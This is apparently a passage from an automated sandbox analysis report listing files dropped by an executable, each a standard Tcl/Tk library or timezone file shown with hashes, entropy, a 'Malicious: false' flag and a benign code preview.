SSDEEP:	6:SlSNJB9IZaM3y7/9EtDvFVAIgp/9EmLkB490/9E6:JBaIMY/944p/9xLN90/9F
MD5:	D588930E34CF0A03EFEE7BFBC5022BC3
SHA1:	0714C6ECAAF7B4D23272443E5E401CE141735E78
SHA-256:	4D1CAE3C453090667549AB83A8DE6F9B654AAC5F540192886E5756A01D21A253
SHA-512:	ABE69BEF808D7B0BEF9F49804D4A753E033D7C99A7EA57745FE4C3CBE2C26114A8845A219ED6DEAB8FA009FDB86E384687068C1BCF8B704CCF24DA7029455802
Malicious:	false
Preview:	# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Anchorage)]} {. LoadTimeZoneFile America/Anchorage.}.set TZData(:SystemV/YST9YDT) $TZData(:America/Anchorage).

C:\Users\user\Desktop\tcl\tzdata\Turkey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.882090609090058
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV0XaDvFVAIgoq3XPHtjCl1yQaqXNn:SlSWB9IZaM3ymQazFVAIgoQPHtSymN
MD5:	41703ED241199F0588E1FC6FF0F33E90
SHA1:	08B4785E21E21DFE333766A7198C325CD062347B
SHA-256:	4B8A8CE69EE94D7E1D49A2E00E2944675B66BD16302FE90E9020845767B0509B
SHA-512:	F90F6B0002274AF57B2749262E1530E21906162E4D1F3BE89639B5449269F3026A7F710C24765E913BC23DEC5A6BF97FC0DD465972892D851B6EAEEF025846CA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Turkey) $TZData(:Europe/Istanbul).

C:\Users\user\Desktop\tcl\tzdata\UCT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	148
Entropy (8bit):	4.792993822845485
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqAmMwFVAIghO6iGMFfh8RS:SlSWB9IZaM3y1wFVAIghFiP8RS
MD5:	1921CC58408AD2D7ED3B5308C71B1A28
SHA1:	12F832D7B3682DC28A49481B8FBA8C55DCDC60D0
SHA-256:	92FC6E3AA418F94C486CE5BF6861FAA4E85047189E98B90DA78D814810E88CE7
SHA-512:	EB134E2E7F7A811BFA8223EB4E98A94905EA24891FD95AB29B52DE2F683C97E086AA2F7B2EA93FBA2451AAEDD22F01219D700812DABC7D6670028ACF9AAB8367
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UCT)]} {. LoadTimeZoneFile Etc/UCT.}.set TZData(:UCT) $TZData(:Etc/UCT).

C:\Users\user\Desktop\tcl\tzdata\US\Alaska Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.864166947846424
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0/VXEtDvFVAIg20/VXE0JLiOGl0IAcGE/VXE6n:SlSWB9IZaM3y7/9EtDvFVAIgp/9EmLiB
MD5:	0763082FF8721616592350D8372D59FF
SHA1:	CEBB03EB7F44530CF52DCA7D55DC912015604D94
SHA-256:	94FDFE2901596FC5DCE74A5560431F3E777AE1EBEEE59712393AE2323F17ADFA
SHA-512:	DFE8AAA009C28C209A925BBE5509589C0087F6CC78F94763BFA9F1F311427E3FF2E377EB340590383D790D3578C1BB37D41525408D027763EA96ECB3A3AAD65D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Anchorage)]} {. LoadTimeZoneFile America/Anchorage.}.set TZData(:US/Alaska) $TZData(:America/Anchorage).

C:\Users\user\Desktop\tcl\tzdata\US\Aleutian Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.839824852896375
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0/yO5pVAIg20/yOvYvtiObMEIB/4IAcGE/yOun:SlSWB9IZaM3y7/ykVAIgp/y9FitE8/47
MD5:	01142938A2E5F30FADE20294C829C116
SHA1:	8F9317E0D3836AF916ED5530176C2BF7A929C3C7
SHA-256:	1DD79263FB253217C36A9E7DDCB2B3F35F208E2CE812DCDE5FD924593472E4FE
SHA-512:	2C47FE8E8ED0833F4724EF353A9A6DFCE3B6614DA744E64364E9AB423EC92565FEF1E8940CB12A0BCCFE0BD6B44583AF230A4ABCC0BAE3D9DC43FBB2C7941CFF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:US/Aleutian) $TZData(:America/Adak).

C:\Users\user\Desktop\tcl\tzdata\US\Arizona Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.886225611026426
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0utLaDvFVAIg20utLPtiQMfQfBx+IAcGEutLNn:SlSWB9IZaM3y7O+FVAIgpObtiZfQfH+v
MD5:	090DC30F7914D5A5B0033586F3158384
SHA1:	2F526A63A1C47F88E320BE1C12CA8887DA2DC989
SHA-256:	47D25266ABBD752D61903C903ED3E9CB485A7C01BD2AA354C5B50DEBC253E01A
SHA-512:	5FE75328595B5DECDAC8D318BEE89EAD744A881898A4B45DD2ABB5344B13D8AFB180E4A8F8D098A9589488D9379B0153CBC5CF638AF7011DE89C57B554F42757
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Phoenix)]} {. LoadTimeZoneFile America/Phoenix.}.set TZData(:US/Arizona) $TZData(:America/Phoenix).

C:\Users\user\Desktop\tcl\tzdata\US\Central Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.854450230853601
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx096dVAIg2096zAtibXgox/h4IAcGE96s:SlSWB9IZaM3y796dVAIgp96WiB49096s
MD5:	E0801B5A57F40D42E8AF6D48C2A41467
SHA1:	A49456A1BF1B73C6B284E0764AEAFD1464E70DDC
SHA-256:	16C7FFCE60495E5B0CB65D6D5A0C3C5AA9E62BD6BC067ABD3CD0F691DA41C952
SHA-512:	3DE6A41B88D6485FD1DED2DB9AB9DAD87B9F9F95AA929D38BF6498FC0FD76A1048CE1B68F24CD22C487073F59BD955AFCB9B7BF3B20090F81FA250A5E7674A53
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Chicago)]} {. LoadTimeZoneFile America/Chicago.}.set TZData(:US/Central) $TZData(:America/Chicago).

C:\Users\user\Desktop\tcl\tzdata\US\East-Indiana Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	223
Entropy (8bit):	4.715837665658945
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y73GK7mFVAIgp3GKBLi3E0903GK1:MBaIMY3GK7Hp3GKBLi3t903GK1
MD5:	1A27644D1BF2299B7CDDED7F405D6570
SHA1:	BD03290A6E7A967152E2E4F95A82E01E7C35F63C
SHA-256:	1C46FAEDFACEB862B2E4D5BD6AC63E5182E1E2CFD2E1CDFA2661D698CC8B0072
SHA-512:	9D6F3E945656DD97A7E956886C1123B298A87704D4F5671E4D1E94531C01F8BE377D83239D8BE78E2B3E1C0C20E5779BA3978F817A6982FE607A18A7FDCF57FB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:US/East-Indiana) $TZData(:America/Indiana/Indianapolis).

C:\Users\user\Desktop\tcl\tzdata\US\Eastern Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.990255962392122
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0wAy0vwVAIg20wAyati37oxp4IAcGEwAy0v:SlSWB9IZaM3y71KVAIgp1Bi37oxp490n
MD5:	3FE03D768F8E535506D92A6BC3C03FD2
SHA1:	F82BF149CE203B5A4A1E106A495D3409AF7A07AC
SHA-256:	9F46C0E46F6FE26719E2CF1FA05C7646530B65FB17D4101258D357568C489D77
SHA-512:	ADFDBB270113A192B2378CC347DD8A57FDBDC776B06F9E16033EE8D5EAB49E16234CA2523580EEBB4DCDD27F33222EDD5514F0D7D85723597F059C5D6131E1B0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/New_York)]} {. LoadTimeZoneFile America/New_York.}.set TZData(:US/Eastern) $TZData(:America/New_York).

C:\Users\user\Desktop\tcl\tzdata\US\Hawaii Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.832149382727646
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQG2fWGYFedVAIgObT2fWzvNioMN75nUDH2fWRn:SlSWB9IZaM3yc6e8dVAIgOb6ezvNioEe
MD5:	347E51049A05224D18F264D08F360CBB
SHA1:	A801725A9B01B5E08C63BD2568C8F5D084F0EB02
SHA-256:	EA5D18E4A7505406D6027AD34395297BCF5E3290283C7CC28B4A34DB8AFBDD97
SHA-512:	C9B96C005D90DD8F317A697F59393D20663DE74D6E4D0B45BCE109B31A328D7AA62C51FAA8D00C728C0342940EF3B0F0921814B31BD7FE128A6E95F92CF50E06
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Honolulu)]} {. LoadTimeZoneFile Pacific/Honolulu.}.set TZData(:US/Hawaii) $TZData(:Pacific/Honolulu).

C:\Users\user\Desktop\tcl\tzdata\US\Indiana-Starke Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	201
Entropy (8bit):	4.825742972037525
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y73GKXFVAIgp3GK4NiGIfh4903GKk:MBaIMY3GKXQp3GKeiBfh4903GKk
MD5:	E111813F4C9B888427B8363949C87C72
SHA1:	96B6692DCD932DCC856804BE0C2145538C4B2B33
SHA-256:	4E896634F3A400786BBD996D1FE0D5C9A346E337027B240F1671A7E4B38C8F69
SHA-512:	97726D7EDB7D7A1F6E815A0B875CAF9E2D2D27F50ECC866FBC6CB1B88836E8C2D64A9C108CD917C9D641B30822397664A2AC8010EADF0FF2A6C205AE4D5E7A2F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Knox)]} {. LoadTimeZoneFile America/Indiana/Knox.}.set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox).

C:\Users\user\Desktop\tcl\tzdata\US\Michigan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	180
Entropy (8bit):	4.7846496799669405
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx06FQGFwVAIg206FQN6iHaMCELMr4IAcGE6FQu:SlSWB9IZaM3y74PFwVAIgp4xiHaMHL+U
MD5:	80A9A00EC1C5904A67DC3E8B2FDC3150
SHA1:	8E79FBEB49D9620E793E4976D0B9085E32C57E83
SHA-256:	8DB76FC871DD334DA87297660B145F8692AD053B352A19C2EFCD74AF923D762D
SHA-512:	0A5662E33C60030265ECAD1FF683B18F6B99543CA5FE22F88BCE597702FBEA20358BCB9A568D7F8B32158D9E6A3D294081D183644AD49C22AC3512F97BE480D4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Detroit)]} {. LoadTimeZoneFile America/Detroit.}.set TZData(:US/Michigan) $TZData(:America/Detroit).

C:\Users\user\Desktop\tcl\tzdata\US\Mountain Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.84430947557215
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0LiBOlLo/4IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iLiBY8/49G
MD5:	13D6C7CF459995691E37741ACAF0A18D
SHA1:	A0626763930C282DF21ED3AA8F1B35033BA2F9DC
SHA-256:	223B5C8E34F459D7B221B83C45DBB2827ABE376653BAA1BC56D09D50DF136B08
SHA-512:	9076DFECC5D02DB38ECE3D2512D52566675D98A857711676E891D8741EA588153954357FE19F4C69305FF05D0F99286F1D496DF0C7FDBC8D59803D1B1CFA5F07
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:US/Mountain) $TZData(:America/Denver).

C:\Users\user\Desktop\tcl\tzdata\US\Pacific Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	191
Entropy (8bit):	4.885594237758327
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0ydJg4owFVAIg20ydJEvRLiP+e2IAcGEydJgvn:SlSWB9IZaM3y7DvwFVAIgpdJLip290Dv
MD5:	EBF51CD015BD387FA2BB30DE8806BDDA
SHA1:	63C2E2F4CD8BC719A06D59EF4CE4C31F17F53EA0
SHA-256:	B7AD78FB955E267C0D75B5F7279071EE17B6DD2842DAD61ADA0165129ADE6A86
SHA-512:	22BECE2AEAD66D921F38B04FDC5A41F2627FCC532A171EA1C9C9457C22CD79EFD1EC3C7CC62BC016751208AD1D064B0F03C2185F096982F73740D8426495F5ED
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Los_Angeles)]} {. LoadTimeZoneFile America/Los_Angeles.}.set TZData(:US/Pacific) $TZData(:America/Los_Angeles).

C:\Users\user\Desktop\tcl\tzdata\US\Pacific-New Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.931883193402467
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7DvwFVAIgpdJLi0Q90Dvn:MBaIMYFpdJLix90z
MD5:	01CD3EBFDB7715805572CDA3F81AC78A
SHA1:	C013C38D2FB9E649EE43FED6910382150C2B3DF5
SHA-256:	DEFE67C520303EF85B381EBEAED4511C0ACF8C49922519023C525E6A1B09B9DD
SHA-512:	266F35C34001CD4FF00F51F5CDF05E1F4D0B037F276EFD2D124C8AE3391D00128416D16D886B3ECDF9E9EFC81C66B2FD4ED55F154437ED5AA32876B855289190
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Los_Angeles)]} {. LoadTimeZoneFile America/Los_Angeles.}.set TZData(:US/Pacific-New) $TZData(:America/Los_Angeles).

C:\Users\user\Desktop\tcl\tzdata\US\Samoa Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.789322986138067
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQGurKeTIVAIgObTurKeUAti6A5nUDHurKeTv:SlSWB9IZaM3ycieZVAIgObieiidXeg
MD5:	E883D478518F6DAF8173361A8D308D34
SHA1:	ABD97858655B0069BFD5E11DD95BF6D7C2109AEA
SHA-256:	DD4B1812A309F90ABBD001C3C73CC2AF1D4116128787DE961453CCBE53EC9B6A
SHA-512:	DA1FE6D92424404111CBB18CA39C8E29FA1F9D2FD262D46231FB7A1A78D79D00F92F5D1DEBB9B92565D1E3BA03EF20D2A44B76BA0FC8B257A601EED5976386CC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago).

C:\Users\user\Desktop\tcl\tzdata\UTC Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	148
Entropy (8bit):	4.792993822845485
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLiLB5h8RFu:SlSWB9IZaM3yzUFVAIgBLiLfh8RI
MD5:	530F5381F9CD8542ED5690E47FC83358
SHA1:	29A065F004F23A5E3606C2DB50DC0AB28CAFC785
SHA-256:	AC0FF734DA267E5F20AB573DBD8C0BD7613B84D86FDA3C0809832F848E142BC8
SHA-512:	4328BDFD6AA935FD539EE2D4A3EBA8DD2A1BD9F44BA0CF30AA0C4EA57B0A58E3CDFAA312366A0F93766AE445E6E210EE57CD5ED60F74173EDF67C1C5CB987C68
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:UTC) $TZData(:Etc/UTC).

C:\Users\user\Desktop\tcl\tzdata\Universal Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	154
Entropy (8bit):	4.829496870339919
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLiL7DJMFfh8RFu:SlSWB9IZaM3yzUFVAIgBLiL7VMr8RI
MD5:	60878BB8E8BE290911CAB2A16AAFAEF7
SHA1:	15C01523EDA134D3E38ECC0A5909A4579BD2A00D
SHA-256:	9324B6C871AC55771C44B82BF4A92AE0BE3B2CC64EBA9FE878571225FD38F818
SHA-512:	C697401F1C979F5A4D33E1026DCE5C77603E56A48405511A09D8CE178F1BF47D60F217E7897061F71CFEA63CC041E64340EF6BAEE0EB037AFD34C71BF0591E3E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Universal) $TZData(:Etc/UTC).

C:\Users\user\Desktop\tcl\tzdata\W-SU Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	167
Entropy (8bit):	4.9534620854837295
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVwTwpVAIgoqzTcYFgIuyQauTnn:SlSWB9IZaM3ymdVAIgohYFgXymn
MD5:	58FBF79D86DBCFF53F74BF7FE5C12DD6
SHA1:	EA8B3317B012A661B3BA4A1FAE0DC5DEDC03BC26
SHA-256:	0DECFEACCE2E2D88C29CB696E7974F89A687084B3DB9564CDED6FC97BCD74E1F
SHA-512:	083B449DE987A634F7199666F9C685EADD643C2C2DD9C8F6C188388266729CE0179F9DC0CD432D713E5FB1649D0AA1A066FE616FC43DA65C4CD787D8E0DE00A6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Moscow)]} {. LoadTimeZoneFile Europe/Moscow.}.set TZData(:W-SU) $TZData(:Europe/Moscow).

C:\Users\user\Desktop\tcl\tzdata\WET Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6694
Entropy (8bit):	3.6896780927557495
Encrypted:	false
SSDEEP:	96:D6U5vo30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:5PIMj544IrvfMsbxZTH7qwQ
MD5:	CD86A6ED164FEB33535D74DF52DC49A5
SHA1:	89843BF23AB113847DCC576990A4FF2CABCA03FE
SHA-256:	AF28754C77BA41712E9C49EF3C9E08F7D43812E3317AD4E2192E971AD2C9B02D
SHA-512:	80C0A7C3BDD458CA4C1505B2144A3AD969F7B2F2732CCBE4E773FBB6ED446C2961E0B5AFFBC124D43CE9AB530C42C8AEC7100E7817566629CE9D01AC057E3549
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:WET) {. {-9223372036854775808 0 0 WET}. {228877200 3600 1 WEST}. {243997200 0 0 WET}. {260326800 3600 1 WEST}. {276051600 0 0 WET}. {291776400 3600 1 WEST}. {307501200 0 0 WET}. {323830800 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 36

C:\Users\user\Desktop\tcl\tzdata\Zulu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	149
Entropy (8bit):	4.830292555237936
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLtaFBURFu:SlSWB9IZaM3yzUFVAIgBLYFaRI
MD5:	6C7C2CE174DB462A3E66D9A8B67A28EB
SHA1:	73B74BEBCDAEBDA4F46748BCA149BC4C7FE82722
SHA-256:	4472453E5346AAA1E1D4E22B87FDC5F3170AA013F894546087D0DC96D4B6EC43
SHA-512:	07209059E5E5EB5EE12821C1AC46922DA2715EB7D7196A478F0FA6866594D3C69F4C50006B0EE517CBF6DB07164915F976398EBBD88717A070D750D5D106BA5D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Zulu) $TZData(:Etc/UTC).

C:\Users\user\Desktop\tcl\word.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.7695981796995355
Encrypted:	false
SSDEEP:	96:Le+U54W3Jp3jgr9a+1FeS9D/CkXg6gvF9D/CYjX16AyyrGuA11/JRJ6xMa89RJ6m:q+W/ga+P39DCd6gt9DC+6AjG9Vn6xMV3
MD5:	DE79F133B24EFA0AD1A8CB0B1F90210F
SHA1:	3C7133228F078C3EB2FBDC05481226FF7D82F40D
SHA-256:	64585C5327B0710D31BFF61C14564FF289ACAAD8743174F95544D8C04306D8C7
SHA-512:	E6F515139B980EDD420E0CD2883146C3C3F472381C8F55E65284CF50AE7D87EFF20B775D539A5FE7F0007DE52DC50F351464F988FE956E916B767D2629D897F9
Malicious:	false
Preview:	# word.tcl --.#.# This file defines various procedures for computing word boundaries in.# strings. This file is primarily needed so Tk text and entry widgets behave.# properly for different platforms..#.# Copyright (c) 1996 by Sun Microsystems, Inc..# Copyright (c) 1998 by Scritpics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# The following variables are used to determine which characters are.# interpreted as white space...if {$::tcl_platform(platform) eq "windows"} {. # Windows style - any but a unicode space char. set ::tcl_wordchars {\S}. set ::tcl_nonwordchars {\s}.} else {. # Motif style - any unicode word char (number, letter, or underscore). set ::tcl_wordchars {\w}. set ::tcl_nonwordchars {\W}.}..# Arrange for caches of the real matcher REs to be kept, which enables the REs.# themselves to be cached for greater performance (and somewhat greater.# clarity too

C:\Users\user\Desktop\tk\bgerror.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8119
Entropy (8bit):	4.822252992121729
Encrypted:	false
SSDEEP:	192:tKrjzDL5//n7n0rBnT2dpEX9ImoYgMu1Z+4wNsf9IkzxekkEUoVS//iNx:tITL5//jxetHxKGkzxesvAKv
MD5:	9F9316AF7FB23FA66AF05529AF4B95C9
SHA1:	AE429F2175A1CEDF83F4A23E1EDAB6101028F5F1
SHA-256:	7CB80810562587D866D182A5F33174EF43B1E0CBBC2B15BF797B5A76B4FD1917
SHA-512:	2DE40D272B837B9A5A2F33B75E75B6335EB08F4756DDA8767AB3FC2FFE192B6929DE04D989A811216F133536562E3EB3EE20C3B2BDA919B8DC6FFAA53501A566
Malicious:	false
Preview:	# bgerror.tcl --.#.#.Implementation of the bgerror procedure. It posts a dialog box with.#.the error message and gives the user a chance to see a more detailed.#.stack trace, and possible do something more interesting with that.#.trace (like save it to a log). This is adapted from work done by.#.Donal K. Fellows..#.# Copyright (c) 1998-2000 by Ajuba Solutions..# Copyright (c) 2007 by ActiveState Software Inc..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..namespace eval ::tk::dialog::error {. namespace import -force ::tk::msgcat::. namespace export bgerror. option add ErrorDialog.function.text [mc "Save To Log"] \..widgetDefault. option add ErrorDialog.function.command [namespace code SaveToLog]. option add ErrorDialogLabel.font TkCaptionFont widgetDefault. if {[tk windowingsystem] eq "aqua"} {..option add ErrorDialogbackground systemAlertBackgroundActive \...widgetDefault..option add ErrorDialog*info.text.background white widgetDefault.

C:\Users\user\Desktop\tk\button.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20134
Entropy (8bit):	4.902628577193507
Encrypted:	false
SSDEEP:	384:EzRtoY3wFnq+j4SpEdPmVmZ6/IVKuzmSaox2ESo+VtocUP5wFnq+j4SpEdPmV8ZK:GoahPSFMmfoz4oFXhPovzmToQBy0zm2I
MD5:	44757F5BDF236E6872FCF82E88D79ACC
SHA1:	01D45BC2E18BBD24FBB484E56C8DEDB270C2DC13
SHA-256:	716F551DA055EE03E0A5145633754917183264F70C657EC478B6D39B0DB20DE8
SHA-512:	4F4C7F878BF90BCFC6E08EBB3565A8D57A34307DCCA61E47B82C6715ACA1F3AA706A746CD893976049D4C3D5C1494EADCAF14B9866EA7C0DA6FCE0B94AAE3C0F
Malicious:	false
Preview:	# button.tcl --.#.# This file defines the default bindings for Tk label, button,.# checkbutton, and radiobutton widgets and provides procedures.# that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 2002 ActiveState Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for buttons..#-------------------------------------------------------------------------..if {[tk windowingsystem] eq "aqua"} {. bind Radiobutton <Enter> {..tk::ButtonEnter %W. }. bind Radiobutton <1> {..tk::ButtonDown %W. }. bind Radiobutton <ButtonRelease-1> {..tk::ButtonUp %W. }. bind Checkbutton <Enter> {..tk::ButtonEnter %W. }. bind Checkbutton <1>

C:\Users\user\Desktop\tk\choosedir.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9644
Entropy (8bit):	4.7532230880971715
Encrypted:	false
SSDEEP:	192:MvjK3vpIKU7JBhpZofNAieYemp8U3wNV97oZAWpopePXUstccjocIv6tq9jJKT4L:M4viKeBQ+3M3wNwfwsFiSIv6wO7R33nC
MD5:	39531504664D07DB43D884F5D1BCA6A9
SHA1:	1B511035F111CACF45D5D23704345ABC7FFDF5C1
SHA-256:	A0F86258294A5D7D7A9475F3A397F5DABA4CF7D748A57C66EA456B4E8C6CA2E1
SHA-512:	BD50BA9E76D4CDEC1FCCED9EF3EED46767A8FE9DDFCAADD85858584FAB883AAB1B140BC7EF4E88E8690DD66E8209FFC165B27B4125F2CFE77DE54B27C3454123
Malicious:	false
Preview:	# choosedir.tcl --.#.#.Choose directory dialog implementation for Unix/Mac..#.# Copyright (c) 1998-2000 by Scriptics Corporation..# All rights reserved...# Make sure the tk::dialog namespace, in which all dialogs should live, exists.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}..# Make the chooseDir namespace inside the dialog namespace.namespace eval ::tk::dialog::file::chooseDir {. namespace import -force ::tk::msgcat::*.}..# ::tk::dialog::file::chooseDir:: --.#.#.Implements the TK directory selection dialog..#.# Arguments:.#.args..Options parsed by the procedure..#.proc ::tk::dialog::file::chooseDir:: {args} {. variable ::tk::Priv. set dataName __tk_choosedir. upvar ::tk::dialog::file::$dataName data. Config $dataName $args.. if {$data(-parent) eq "."} {. set w .$dataName. } else {. set w $data(-parent).$dataName. }.. # (re)create the dialog box if necessary. #. if {![winfo exists $w]} {..::tk::dialog::file::Create

C:\Users\user\Desktop\tk\clrpick.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21301
Entropy (8bit):	4.982898618853273
Encrypted:	false
SSDEEP:	384:HjJsgeqJelEc661T26UYdBVDyPHxQlefbGIjVjrdOqAQBxhKN2zD5yT9RmqEdFC6:DagJJlRfxQEHN
MD5:	6E658C822220893266EAE22DC14DFF01
SHA1:	AFF84F123E886DF2FCFBE69488AC733E26697F8F
